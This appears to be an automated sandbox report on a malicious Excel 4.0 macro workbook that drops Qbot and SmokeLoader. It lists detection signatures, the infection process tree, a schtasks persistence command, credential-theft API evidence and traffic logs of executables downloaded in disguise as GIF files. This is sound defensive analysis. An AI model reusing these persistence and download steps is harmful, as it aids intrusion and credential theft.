Loading ...

Play interactive tourEdit tour

Analysis Report Document 8402.xlsb

Overview

General Information

Sample Name:Document 8402.xlsb
Analysis ID:298874
MD5:3c9afdda16363bddf5a1d9fdac5ef6b0
SHA1:759cf38816a52260efad6772d476fd0b8ab05f50
SHA256:749e71cdc565bbcf356afd5e3c1dafdf7280968e3a63ab386f4e8dc979c925a0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malicious Excel 4.0 Macro
System process connects to network (likely due to code injection or exploit)
Yara detected Qbot
Yara detected SmokeLoader
Binary contains a suspicious time stamp
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect virtual machines (IN, VMware)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found evasive API chain (may stop execution after checking mutex)
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
May use the Tor software to hide its network traffic
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Renames NTDLL to bypass HIPS
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6748 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • Msysprotect.exe (PID: 5108 cmdline: 'C:\Gm238uw8\Fzr3bP\Msysprotect.exe' MD5: 492C84C9ECDD639D465C3D19F391C5DA)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • A185.exe (PID: 6320 cmdline: C:\Users\user~1\AppData\Local\Temp\A185.exe MD5: F3DE8A6AEFFADA92423BE84B2B0DB00C)
        • B7AE.exe (PID: 6692 cmdline: C:\Users\user~1\AppData\Local\Temp\B7AE.exe MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • B7AE.exe (PID: 6580 cmdline: C:\Users\user~1\AppData\Local\Temp\B7AE.exe /C MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • mhgtn.exe (PID: 5868 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exe MD5: 7D6F961863CADC88760D0ECADC8B94D7)
          • schtasks.exe (PID: 5932 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn lrupplc /tr '\'C:\Users\user~1\AppData\Local\Temp\B7AE.exe\' /I lrupplc' /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • explorer.exe (PID: 6628 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 1300 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 6772 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 6760 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 4312 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • explorer.exe (PID: 5224 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • bijvfaa (PID: 1292 cmdline: C:\Users\user\AppData\Roaming\bijvfaa MD5: 492C84C9ECDD639D465C3D19F391C5DA)
  • dmxhr.exe (PID: 2804 cmdline: C:\ProgramData\uohr\dmxhr.exe start MD5: F3DE8A6AEFFADA92423BE84B2B0DB00C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.395141332.0000000000400000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    00000018.00000003.411696862.0000000002411000.00000004.00000001.sdmpJoeSecurity_QbotYara detected QbotJoe Security
      00000018.00000002.426577648.0000000002190000.00000040.00000001.sdmpJoeSecurity_QbotYara detected QbotJoe Security
        00000025.00000002.444336139.0000000000400000.00000040.00020000.sdmpJoeSecurity_QbotYara detected QbotJoe Security
          00000013.00000003.382516594.0000000000A30000.00000004.00000001.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            37.2.mhgtn.exe.400000.0.raw.unpackJoeSecurity_QbotYara detected QbotJoe Security
              24.2.B7AE.exe.21d0000.1.raw.unpackJoeSecurity_QbotYara detected QbotJoe Security
                4.2.Msysprotect.exe.400000.0.raw.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                  19.3.bijvfaa.a30000.0.raw.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                    4.2.Msysprotect.exe.400000.0.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: C:\Users\user\AppData\Local\Temp\B7AE.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Gm238uw8\Fzr3bP\Msysprotect.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\bijvfaaJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\15[1].gifJoe Sandbox ML: detected
                      Source: C:\ProgramData\uohr\dmxhr.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Ivaqk\mhgtn.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\B7AE.exeJoe Sandbox ML: detected
                      Source: 18.2.A185.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 24.2.B7AE.exe.21d0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 27.2.B7AE.exe.2200000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 37.2.mhgtn.exe.2200000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_00404609 VirtualAlloc,DecryptMessage,18_2_00404609
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_004044D4 SetUnhandledExceptionFilter,QueryContextAttributesA,VirtualAlloc,EncryptMessage,18_2_004044D4
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_00403E80 CryptImportKey,CryptExportKey,CryptDestroyKey,18_2_00403E80
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_00403BA6 CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,18_2_00403BA6
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_004040B5 CryptStringToBinaryA,CryptStringToBinaryA,18_2_004040B5
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_004011B8 CryptAcquireContextA,CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext,18_2_004011B8
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_00401DBD CryptReleaseContext,18_2_00401DBD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C73171 StrRChrIW,StrRChrIW,StrRChrIW,StrRChrIW,RtlCompareMemory,CryptUnprotectData,25_2_00C73171
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C73364 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,25_2_00C73364
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C73696 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,25_2_00C73696
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C711E6 CryptBinaryToStringA,CryptBinaryToStringA,25_2_00C711E6
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C7213A CryptUnprotectData,RtlMoveMemory,25_2_00C7213A
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C71289 StrRChrIW,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,25_2_00C71289
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C7122F lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,25_2_00C7122F
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_009E26AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,29_2_009E26AC
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: -----BEGIN RSA PUBLIC KEY-----18_2_004040B5
                      Source: A185.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY-----
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C71EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,FindNextFileW,FindClose,25_2_00C71EBA
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00C72C81 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,25_2_00C72C81
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_009E255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,29_2_009E255C
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior

                      Software Vulnerabilities:

                      barindex
                      Document exploit detected (process start blacklist hit)Show sources
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Gm238uw8\Fzr3bP\Msysprotect.exeJump to behavior
                      Source: excel.exeMemory has grown: Private usage: 1MB later: 78MB

                      Networking:

                      barindex
                      Downloads files with wrong headers with respect to MIME Content-TypeShow sources
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Thu, 15 Oct 2020 17:51:12 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 15 Oct 2020 09:34:15 GMT ETag: "32032e2-22200-5b1b259f3d3c0" Accept-Ranges: bytes Content-Length: 139776 Keep-Alive: timeout=5 Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 6a aa 6e 3e 0b c4 3d 3e 0b c4 3d 3e 0b c4 3d 20 59 51 3d 24 0b c4 3d 20 59 40 3d 15 0b c4 3d 20 59 47 3d 57 0b c4 3d 19 cd bf 3d 3b 0b c4 3d 3e 0b c5 3d b8 0b c4 3d 20 59 4e 3d 3f 0b c4 3d 20 59 56 3d 3f 0b c4 3d 20 59 50 3d 3f 0b c4 3d 20 59 55 3d 3f 0b c4 3d 52 69 63 68 3e 0b c4 3d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 45 e5 fc 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 74 01 00 00 a0 4a 00 00 00 00 00 ac 2b 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 ea cb 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 de 01 00 47 00 00 00 78 d3 01 00 3c 00 00 00 00 b0 4b 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 42 73 01 00 00 10 00 00 00 74 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d7 4e 00 00 00 90 01 00 00 50 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 cf 49 00 00 e0 01 00 00 16 00 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 43 00 00 00 b0 4b 00 00 44 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficTCP traffic: 192.168.2.7:49743 -> 142.4.7.183:4035
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Oct 2020 17:51:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 15 Oct 2020 09:34:15 GMTETag: "32032e2-22200-5b1b259f3d3c0"Accept-Ranges: bytesContent-Length: 139776Keep-Alive: timeout=5Content-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 6a aa 6e 3e 0b c4 3d 3e 0b c4 3d 3e 0b c4 3d 20 59 51 3d 24 0b c4 3d 20 59 40 3d 15 0b c4 3d 20 59 47 3d 57 0b c4 3d 19 cd bf 3d 3b 0b c4 3d 3e 0b c5 3d b8 0b c4 3d 20 59 4e 3d 3f 0b c4 3d 20 59 56 3d 3f 0b c4 3d 20 59 50 3d 3f 0b c4 3d 20 59 55 3d 3f 0b c4 3d 52 69 63 68 3e 0b c4 3d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 45 e5 fc 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 74 01 00 00 a0 4a 00 00 00 00 00 ac 2b 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 ea cb 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 de 01 00 47 00 00 00 78 d3 01 00 3c 00 00 00 00 b0 4b 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 42 73 01 00 00 10 00 00 00 74 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d7 4e 00 00 00 90 01 00 00 50 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 cf 49 00 00 e0 01 00 00 16 00 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 43 00 00 00 b0 4b 00 00 44 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdos-programContent-Length: 125440Connection: keep-aliveKeep-Alive: timeout=15Date: Thu, 15 Oct 2020 17:52:00 GMTServer: ApacheLast-Modified: Mon, 05 Oct 2020 12:04:35 GMTETag: "1ea00-5b0eb492c5ac0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 6a aa 6e 3e 0b c4 3d 3e 0b c4 3d 3e 0b c4 3d 20 59 51 3d 24 0b c4 3d 20 59 40 3d 15 0b c4 3d 20 59 47 3d 57 0b c4 3d 19 cd bf 3d 3b 0b c4 3d 3e 0b c5 3d b8 0b c4 3d 20 59 4e 3d 3f 0b c4 3d 20 59 56 3d 3f 0b c4 3d 20 59 50 3d 3f 0b c4 3d 20 59 55 3d 3f 0b c4 3d 52 69 63 68 3e 0b c4 3d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 02 af ad 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 3c 01 00 00 9e 4a 00 00 00 00 00 ac 2b 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 c6 55 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 9e 01 00 48 00 00 00 78 93 01 00 3c 00 00 00 00 70 4b 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 22 3a 01 00 00 10 00 00 00 3c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 4e 00 00 00 50 01 00 00 50 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 cf 49 00 00 a0 01 00 00 16 00 00 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 43 00 00 00 70 4b 00 00 44 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Oct 2020 17:52:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Thu, 15 Oct 2020 17:50:38 GMTETag: "177440-5b1b9492d7609"Accept-Ranges: bytesContent-Length: 1537088Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 3a 88 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 01 00 0c 00 00 00 60 17 00 00 00 00 00 90 15 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 17 00 00 04 00 00 40 e9 17 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 22 00 00 3c 00 00 00 00 10 14 00 20 7f 03 00 00 00 00 00 00 00 00 00 00 70 17 00 40 04 00 00 00 90 17 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 22 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 0a 00 00 00 10 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 